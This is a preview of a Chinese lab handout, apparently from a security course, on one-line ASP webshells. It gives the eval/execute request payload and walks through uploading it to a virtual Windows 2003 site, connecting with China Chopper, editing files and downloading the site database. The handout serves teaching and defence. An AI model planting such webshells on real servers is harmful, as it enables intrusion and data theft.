L003001041一句話木馬測(cè)試分析_第1頁(yè)
L003001041一句話木馬測(cè)試分析_第2頁(yè)
L003001041一句話木馬測(cè)試分析_第3頁(yè)
L003001041一句話木馬測(cè)試分析_第4頁(yè)
L003001041一句話木馬測(cè)試分析_第5頁(yè)
已閱讀5頁(yè),還剩17頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

1、 課程編寫(xiě)類(lèi)別內(nèi)容實(shí)驗(yàn)課題名稱L003001041-一句話木馬測(cè)試分析實(shí)驗(yàn)?zāi)康呐c要求熟悉一句話木馬的原理,掌握一句話木馬的使用以及防御方法實(shí)驗(yàn)環(huán)境VPC1(虛擬PC)操作系統(tǒng)類(lèi)型:windows server 2003和windows XP professional,網(wǎng)絡(luò)接口:本地連接VPC1 連接要求PC 網(wǎng)絡(luò)接口,本地連接與實(shí)驗(yàn)網(wǎng)絡(luò)直連軟件描述中國(guó)菜刀實(shí)驗(yàn)環(huán)境描述1、 學(xué)生機(jī)與實(shí)驗(yàn)室網(wǎng)絡(luò)直連;2、 VPC1與實(shí)驗(yàn)室網(wǎng)絡(luò)直連;3、 學(xué)生機(jī)與VPC1物理鏈路連通;預(yù)備知識(shí)黑客在注冊(cè)信息的電子郵箱或者個(gè)人主頁(yè)等中插入類(lèi)似如下代碼:<

2、;%execute request("value")%>其中value是值,所以你可以更改自己的值,前面的request就是獲取這個(gè)值<%eval request("value")%>(現(xiàn)在比較多見(jiàn)的,而且字符少,對(duì)表單字?jǐn)?shù)有限制的地方特別的實(shí)用)當(dāng)知道了數(shù)據(jù)庫(kù)的URL,就可以利用本地一張網(wǎng)頁(yè)進(jìn)行連接得到Webshell。(不知道數(shù)據(jù)庫(kù)也可以,只要知道<%eval request("value")%>這個(gè)文件被插入到哪一個(gè)ASP文件里面就可以了。)這就被稱為一句話木馬,它是基于B/S結(jié)構(gòu)的。實(shí)驗(yàn)內(nèi)容理解該

3、漏洞的實(shí)現(xiàn)過(guò)程實(shí)驗(yàn)步驟l  學(xué)生登錄實(shí)驗(yàn)場(chǎng)景的操作1、 學(xué)生單擊 “網(wǎng)絡(luò)拓?fù)洹边M(jìn)入實(shí)驗(yàn)場(chǎng)景,單擊windows2003中的“打開(kāi)控制臺(tái)”按鈕,進(jìn)入目標(biāo)主機(jī)。如圖所示:我們把windows2003機(jī)器作為服務(wù)機(jī)(ip地址為192.168.1.154,不固定)2、學(xué)生輸入賬號(hào)Administrator ,密碼123456,登錄到實(shí)驗(yàn)場(chǎng)景中的Windows server 2003,在該機(jī)器上搭建一個(gè)網(wǎng)站,并且能夠正常訪問(wèn)。如圖所示:3、學(xué)生輸入賬號(hào)Administrator ,密碼123456,登錄到實(shí)驗(yàn)場(chǎng)景中的Windows XP Professional。如圖所示:4.打開(kāi)w

4、indows 2003上的網(wǎng)站,我們通過(guò)名小子或者啊D獲取到了后臺(tái)地址(這兩個(gè)工具的使用方法可以參考明小子和啊Dsql注入實(shí)例),以及用戶名和密碼(均是admin),然后登陸進(jìn)去。如圖所示:5.然后看到左邊有一個(gè)文件上傳菜單,點(diǎn)擊它。如圖所示:6.接下來(lái)我們可以在本地創(chuàng)建一個(gè)包含有一個(gè)一句話木馬的asp文件。內(nèi)容為“<%eval request("6")%>”,其中小括號(hào)里的6是咱們連接一句話的密碼,密碼也可以自行設(shè)置。如圖所示:7.將剛才新建的文檔,重命名為7.asp。如圖所示:。如圖所示:9點(diǎn)擊打開(kāi)后,進(jìn)行上傳,標(biāo)題出寫(xiě)為8,并點(diǎn)擊提交按鈕。如圖所示:10.

5、 提交完成后,就可以看到7.asp的保存路徑了。如圖所示:11.然后我們?cè)跒g覽器里進(jìn)行訪問(wèn)。如圖所示:12.此處一片空白,說(shuō)明我們上傳的木馬上傳成功并可以執(zhí)行。然后打開(kāi)中國(guó)菜刀進(jìn)行連接。進(jìn)入到D:tools文件夾,打開(kāi)chopper.exe。如圖所示:13.默認(rèn)情況下,中國(guó)菜刀自己會(huì)有幾個(gè)示例。我們右擊空白處,選擇添加。如圖所示:14把剛才訪問(wèn)asp文件的地址放進(jìn)地址欄,右側(cè)輸入連接密碼“6”。下方默認(rèn)類(lèi)別不用改,腳本類(lèi)型我們選擇asp(Eval)類(lèi)型,字符編碼選擇GB2312。如圖所示:15添加完畢后,我們右擊該記錄,然后選擇文件管理。如圖所示:16.接下來(lái)我們就會(huì)連接到剛才上傳07.asp文件的目錄。如圖所示:17.我們可以進(jìn)入網(wǎng)站根目錄article,可以編輯任何文件,右擊要編輯的文件。如圖所示:18.會(huì)打開(kāi)一個(gè)新的編輯框,編輯完后點(diǎn)擊上方的保存按鈕即可。19.另外還可以進(jìn)行上傳下載文件,比如我們可以將測(cè)試網(wǎng)站的數(shù)據(jù)庫(kù)article數(shù)據(jù)庫(kù)下載下來(lái)。右擊article.mdb,選擇下載文件。如圖所示:20.接下來(lái)選擇要保存article.mdb的路徑,保存到桌面上,然后點(diǎn)擊保存。21.接下來(lái)待會(huì)就可以看到article.mdb保存到桌面上了。如圖所示:22.另外我們通過(guò)中國(guó)菜刀還可以看到其他盤(pán)符的內(nèi)容。23關(guān)

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

評(píng)論

0/150

提交評(píng)論